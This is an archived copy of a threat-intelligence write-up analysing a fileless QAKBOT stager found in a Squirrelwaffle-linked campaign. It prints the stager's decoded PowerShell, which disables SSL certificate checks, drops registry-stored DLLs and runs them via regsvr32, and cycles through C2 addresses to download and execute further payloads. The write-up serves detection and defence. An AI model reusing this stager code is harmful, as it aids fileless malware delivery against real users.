{
	"id": "761b9c83-e551-4ad9-9997-7557b3a8b279",
	"created_at": "2026-04-06T00:15:38.35182Z",
	"updated_at": "2026-04-10T03:20:39.159397Z",
	"deleted_at": null,
	"sha1_hash": "dcfcbc82fc2870ac9630bc39c40a029d95214c21",
	"title": "Staging a Quack: Reverse Analyzing a Fileless QAKBOT Stager",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 196061,
	"plain_text": "Staging a Quack: Reverse Analyzing a Fileless QAKBOT Stager\r\nPublished: 2021-12-17 · Archived: 2026-04-05 17:01:02 UTC\r\nWe analyzed a fileless QAKBOT stager possibly connected to the recently reported Squirrelwaffle campaign.\r\nBy: Abraham Camba, Jonna Santos, Gilbert Sison, Jay Yaneza Dec 17, 2021 Read time: 4 min (1024 words)\r\nWe recently published how Squirrelwaffle emerged as a loader using two exploits in a recent spam campaign in\r\nthe Middle East. Further monitoring and analysis from our incident response and extended detection and response\r\nteams (IR/XDR) found that one of Squirrelwaffle’s payloads includes QAKBOT, a banking trojan and infostealer\r\nthat cybercriminals have been using since 2007.  \r\nDuring one of our threat hunting initiatives, we found a fileless QAKBOT stager capable of achieving persistence\r\non its own. Furthermore, while QAKBOT is one of the payloads it stages filelessly in the registry, the stager is\r\nalso capable of staging for more than one malware, a capability that can likely be abused for more campaigns in\r\nthe future.\r\nTechnical details\r\nFigure 1. Infection chain and timeline\r\nhttps://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html\r\nPage 1 of 6\n\nWe found a suspicious PowerShell execution in an infected system in the following form:\r\nFigure 2. PowerShell execution observed\r\nWhen the code is obfuscated via base64, the command line parameter is usually long and noticeable via XDR. But\r\nthis specific execution is noticeably short and reads filelessly in the registry despite its base64 encoding.\r\nUsing Trend Micro™ Vision One™ with Managed XDR’s progressive root cause analysis (RCA), we were able to\r\ntrace back the execution to the legitimate process services.exe. It turns out that the suspicious PowerShell\r\nexecution is triggered via a scheduled task.\r\nFigure 3. 
Tracking the suspicious execution with Trend Micro Vision One\r\nFigure 4. A scheduled task triggered the PowerShell execution.\r\nThe PowerShell command is an example of a fileless technique wherein the actual command is stored in the\r\nregistry. In this case, it was stored in the registry entry HKCU:\\SOFTWARE\\Uiggvsbhwbcvhom).vqaryay, again\r\nencoded in base64.\r\nBreaking down the decrypted strings\r\nWe decrypted and analyzed the encoded string and broke it down. The code’s variables seem to be obfuscated\r\nvia a randomizer, likely to circumvent detection to a certain extent.\r\n$KtdH = \"{E6CF5F45-43D0-4514-96DE-151BD04A9079}\" \u003c-- Mutex Name\r\n$PgZYjDK = \"qafsdb378960\" \u003c-- URL parameter (seems to be an ID)\r\n$d_IP = \"/zkr\" \u003c-- URL path\r\n$LngwgFRytJ = \"jhysoq\" \u003c-- Registry Entry 1\r\n$awwWcsGQX = \"gqdmzka\" \u003c-- Registry Entry 2\r\n$g_JXBUAMH = \"irwtoakzd\" \u003c-- Registry Entry 3\r\n$WQudUrNwDr = \"daedvnjlph\" \u003c-- Registry Entry 4 (Date Entry)\r\n$tvDQbLr = \"HKCU:\\SOFTWARE\\Uiggvsbhwbcvhom\" \u003c-- Registry Key\r\nThe next set of code sets PowerShell to skip secure sockets layer (SSL) certificate checks, bypassing the inherent\r\nsecurity protocol.\r\nadd-type @\"\r\n    using System.Net;\r\n    using System.Security.Cryptography.X509Certificates;\r\n    public class TrustAllCertsPolicy : ICertificatePolicy {\r\n        public bool CheckValidationResult(\r\n            ServicePoint srvPoint, X509Certificate certificate,\r\n            WebRequest request, int certificateProblem) {\r\n            return true;\r\n        }\r\n    }\r\n\"@\r\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\r\nThe string then checks for a mutex to ensure a single execution, which is usual for malware implementations. 
It\r\nalso checks if the date is already set in registry entry 4. While the exact date is insignificant, it serves as a marker\r\nfor this fileless malware. If the marker is not yet set, it will proceed with a drop-and-execute routine. Otherwise, it\r\nskips the routine.\r\nfunction UQTV()\r\n{\r\n    $MwmmBxnVjO = Get-Random\r\n    $RBnYwaG = (Get-ItemProperty -Path $tvDQbLr).$LngwgFRytJ\r\n    if ($RBnYwaG) {\r\n        $_f_zhkPw = \"$env:TEMP\\\\$($MwmmBxnVjO)1.dll\"\r\n        $fPsS = [System.Convert]::FromBase64String($RBnYwaG)\r\n        [System.IO.File]::WriteAllBytes($_f_zhkPw, $fPsS)\r\n        Start-Process -FilePath \"regsvr32.exe\" -ArgumentList \"$_f_zhkPw\"\r\n    } else {\r\n    }\r\n    $OlKwHqqEa = (Get-ItemProperty -Path $tvDQbLr).$awwWcsGQX\r\n    if ($OlKwHqqEa) {\r\n        $_f_zhkPw = \"$env:TEMP\\\\$($MwmmBxnVjO)2.dll\"\r\n        $fPsS = [System.Convert]::FromBase64String($OlKwHqqEa)\r\n        [System.IO.File]::WriteAllBytes($_f_zhkPw, $fPsS)\r\n        Start-Process -FilePath \"regsvr32.exe\" -ArgumentList \"$_f_zhkPw\"\r\n    } else {\r\n    }\r\n}\r\nDepending on which registry entry is present (either registry entry 1 or 2), the string will drop and execute via\r\nregsvr32.exe a dynamic link library (DLL) file that was filelessly stored in either registry entry 1 or 2. We\r\nobserved that the DLL file is a QAKBOT variant.\r\nAt this point, it’s easy to assume that the stager is done since it has already dropped the main payload. We\r\nobserved that at this stage, it has only performed half of its purpose. 
Continuing with the decrypted code, we see\r\nthis:\r\n$PNpOl = (Get-ItemProperty -Path $tvDQbLr).$g_JXBUAMH\r\nif (!$PNpOl) {\r\n    exit\r\n}\r\n$mbATsNmtaw = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($PNpOl))\r\n$anvsPJMJpe = 0;\r\n$DXSMgDi = $mbATsNmtaw.Split(\";\")\r\nforeach ($qtNuK_ in $DXSMgDi) {\r\n    __NOxzyOQT $qtNuK_\r\n    if ($global:rcxEcF -eq 1) {\r\n        break\r\n    }\r\n    $anvsPJMJpe++\r\n}\r\nexit 0\r\nThe stager reads registry entry 3, and the content of this registry entry is another encoded string. When decrypted, the\r\nstring is a list of combined IP addresses and ports. Configured in memory, the stager would have access to the\r\nURL format of hxxps[:]//\u003cIP\u003e:\u003cPort\u003e/zkr?n=qafsdb378960, where it would take three parameters:\r\nThe first parameter is for the switch case:\r\n1. Execute via regsvr32.exe\r\n2. Execute via Start-Process (exe)\r\n3. Execute via invoke-expression (IEX)\r\n4. Execute via cmd.exe\r\n5. Execute via Start-Process (bat)\r\n6. Execute via Start-Process (vbs)\r\nThe second parameter is for error handling.\r\nThe third parameter is for the content of the PE file to be downloaded and executed.\r\nConclusion\r\nWhile we observed this fileless stager only deploying QAKBOT, it can also stage other\r\nmalware. It also achieves persistence via a scheduled task, which means it can also deploy multiple types of\r\nmalware as deemed necessary by the cybercriminals behind this stager, with each malware execution triggered\r\nby the scheduled task.\r\nThere were instances where QAKBOT has tried to hide its tracks by being fileless. 
However, this is the first time\r\nwe have encountered this kind of fileless stager with persistence, and having the capability to move laterally\r\nand download other types of malware such as ransomware. Security teams are advised to reinforce and\r\nenable their monitoring mechanisms for better visibility of fileless malware artifacts, suspicious variables, and\r\nmalicious processes.\r\nTrend Micro solutions\r\nUsers can also opt to protect systems through managed detection and response (MDR) products, which bring in the\r\nexpertise of skilled cybersecurity personnel capable of reading between the lines of the data gathered by advanced artificial\r\nintelligence and machine learning technology to correlate and prioritize threats, determining if they are part of a\r\nlarger attack. Combined with the visibility to track and monitor both malicious and legitimate processes abused\r\nfor fileless threats and routines in siloed systems, MDR can detect threats before they are executed, preventing\r\nfurther compromise and mitigating the risks of an attack’s lateral spread.\r\nIndicators of Compromise (IOCs)\r\nView the full list of IOCs here.\r\nSource: https://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html"
	],
	"report_names": [
		"staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434538,
	"ts_updated_at": 1775791239,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dcfcbc82fc2870ac9630bc39c40a029d95214c21.pdf",
		"text": "https://archive.orkl.eu/dcfcbc82fc2870ac9630bc39c40a029d95214c21.txt",
		"img": "https://archive.orkl.eu/dcfcbc82fc2870ac9630bc39c40a029d95214c21.jpg"
	}
}